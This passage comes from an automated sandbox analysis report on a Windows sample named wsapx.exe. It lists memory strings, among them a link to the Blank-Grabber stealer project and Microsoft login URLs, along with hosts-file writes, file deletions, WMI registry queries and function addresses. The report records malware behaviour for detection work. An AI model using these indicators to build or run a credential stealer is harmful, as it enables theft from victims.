              Source: wsapx.exe, 00000002.00000003.2326531713.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2184526777.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2419336236.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653479428.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2646879000.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: wsapx.exe, 00000002.00000003.2307866368.000001C879E7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
              Source: wsapx.exe, 00000002.00000003.2182778701.000001C879E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B25C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000B.00000002.2289972214.000002A23ACB7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2442904993.000001FAD4F50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE36DE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000041.00000002.2501155359.000001FAE359B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000041.00000002.2442904993.000001FAD4B26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: wsapx.exe, 00000002.00000002.2655489440.000001C87A180000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: wsapx.exe, 00000002.00000002.2652550668.000001C879930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: wsapx.exe, 00000002.00000003.2650218345.000001C879FFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: wsapx.exe, 00000000.00000003.2151872993.0000015A08630000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: wsapx.exe, 00000002.00000003.2342123848.000001C879EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
              Source: wsapx.exe, 00000002.00000002.2653029394.000001C879D92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: wsapx.exe, 00000002.00000003.2181812826.000001C879A50000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2183214516.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2653029394.000001C879D58000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2181812826.000001C879A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: wsapx.exe, 00000002.00000003.2420350935.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652361959.000001C8798CB000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879E7C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: wsapx.exe, 00000002.00000002.2655861700.000001C87A3B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: wsapx.exe, 00000002.00000002.2655646494.000001C87A2A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A5A8000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/
              Source: wsapx.exe, 00000002.00000003.2645964472.000001C87A11D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: wsapx.exe, 00000002.00000003.2352327129.000001C87AA7F000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2332910411.000001C87AA7F000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: wsapx.exe, 00000002.00000003.2342123848.000001C879EF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org#
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/
              Source: wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A093000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A093000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: wsapx.exe, 00000002.00000003.2333612973.000001C87AA5E000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312078501.000001C87A11D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C87A05F000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A063000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2312208578.000001C87AA86000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A063000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B248000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: wsapx.exe, 00000000.00000003.2150947438.0000015A08630000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2667660778.00007FFD93D99000.00000004.00000001.01000000.0000000A.sdmp, wsapx.exe, 00000002.00000002.2670016221.00007FFDA33D8000.00000004.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: wsapx.exe, 00000002.00000002.2651928878.000001C8794D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: wsapx.exe, 00000002.00000002.2667746115.00007FFD942D2000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: wsapx.exe, 00000002.00000002.2667746115.00007FFD941D4000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: wsapx.exe, 00000002.00000002.2655982929.000001C87A4C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B1E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: wsapx.exe, 00000002.00000002.2665843936.000001C87B218000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: wsapx.exe, 00000002.00000002.2654490430.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2420350935.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2418159022.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421963487.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2370327129.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2358812914.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2648686643.000001C87A0BE000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2307866368.000001C879EAD000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2306855600.000001C87A0C3000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2335221807.000001C879FA0000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2324012441.000001C87A0C5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2650036552.000001C879A3B000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2421570501.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652705935.000001C879A3C000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2366438701.000001C879A3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\wsapx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\GAOBCVIQIJ.pdfJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\EOWRVPQCCS.mp3Jump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\BNAGMGSPLO.pdfJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\BNAGMGSPLO.pdfJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ?? ?\Common Files\Desktop\QCFWYSKMHA.pngJump to behavior
              Source: C:\Users\user\Desktop\wsapx.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: cmd.exeProcess created: 64

              System Summary

              barindex
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\tree.comWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E5E3A70: CreateFileW,CreateFileW,DeviceIoControl,CloseHandle,110_2_00007FF60E5E3A70
              Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exeCode function: 110_2_00007FF60E60B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,110_2_00007FF60E60B57C
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71B10000_2_00007FF7C71B1000
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71B8BD00_2_00007FF7C71B8BD0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D09380_2_00007FF7C71D0938
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D69D40_2_00007FF7C71D69D4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71B98700_2_00007FF7C71B9870
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D18E40_2_00007FF7C71D18E4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71CDF600_2_00007FF7C71CDF60
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C1FD00_2_00007FF7C71C1FD0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D97980_2_00007FF7C71D9798
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C17B00_2_00007FF7C71C17B0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C88040_2_00007FF7C71C8804
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C9F100_2_00007FF7C71C9F10
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D5EEC0_2_00007FF7C71D5EEC
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71BAD1D0_2_00007FF7C71BAD1D
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C1DC40_2_00007FF7C71C1DC4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C5DA00_2_00007FF7C71C5DA0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C36100_2_00007FF7C71C3610
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71CE5E00_2_00007FF7C71CE5E0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C2C800_2_00007FF7C71C2C80
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D3C800_2_00007FF7C71D3C80
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D09380_2_00007FF7C71D0938
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D64880_2_00007FF7C71D6488
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D5C700_2_00007FF7C71D5C70
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71BA4E40_2_00007FF7C71BA4E4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71BA34B0_2_00007FF7C71BA34B
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C1BC00_2_00007FF7C71C1BC0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71CDACC0_2_00007FF7C71CDACC
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C81540_2_00007FF7C71C8154
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71D411C0_2_00007FF7C71D411C
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C21D40_2_00007FF7C71C21D4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C19B40_2_00007FF7C71C19B4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 0_2_00007FF7C71C3A140_2_00007FF7C71C3A14
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71B10002_2_00007FF7C71B1000
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D69D42_2_00007FF7C71D69D4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71B98702_2_00007FF7C71B9870
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D18E42_2_00007FF7C71D18E4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71CDF602_2_00007FF7C71CDF60
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C1FD02_2_00007FF7C71C1FD0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D97982_2_00007FF7C71D9798
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C17B02_2_00007FF7C71C17B0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C88042_2_00007FF7C71C8804
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C9F102_2_00007FF7C71C9F10
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D5EEC2_2_00007FF7C71D5EEC
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71BAD1D2_2_00007FF7C71BAD1D
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C1DC42_2_00007FF7C71C1DC4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C5DA02_2_00007FF7C71C5DA0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C36102_2_00007FF7C71C3610
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71CE5E02_2_00007FF7C71CE5E0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C2C802_2_00007FF7C71C2C80
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D3C802_2_00007FF7C71D3C80
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D09382_2_00007FF7C71D0938
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D64882_2_00007FF7C71D6488
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D5C702_2_00007FF7C71D5C70
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71BA4E42_2_00007FF7C71BA4E4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71BA34B2_2_00007FF7C71BA34B
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C1BC02_2_00007FF7C71C1BC0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71B8BD02_2_00007FF7C71B8BD0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71CDACC2_2_00007FF7C71CDACC
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D09382_2_00007FF7C71D0938
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C81542_2_00007FF7C71C8154
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71D411C2_2_00007FF7C71D411C
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C21D42_2_00007FF7C71C21D4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C19B42_2_00007FF7C71C19B4
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FF7C71C3A142_2_00007FF7C71C3A14
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD93D97B302_2_00007FFD93D97B30
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD944910002_2_00007FFD94491000
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD946218A02_2_00007FFD946218A0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD946212F02_2_00007FFD946212F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947C18502_2_00007FFD947C1850
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947582902_2_00007FFD94758290
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94758CF02_2_00007FFD94758CF0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD94760A502_2_00007FFD94760A50
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947B9A702_2_00007FFD947B9A70
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947A94F02_2_00007FFD947A94F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9478E4F02_2_00007FFD9478E4F0
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD947494802_2_00007FFD94749480
              Source: C:\Users\user\Desktop\wsapx.exeCode function: 2_2_00007FFD9476B4902_2_00007FFD9476B490
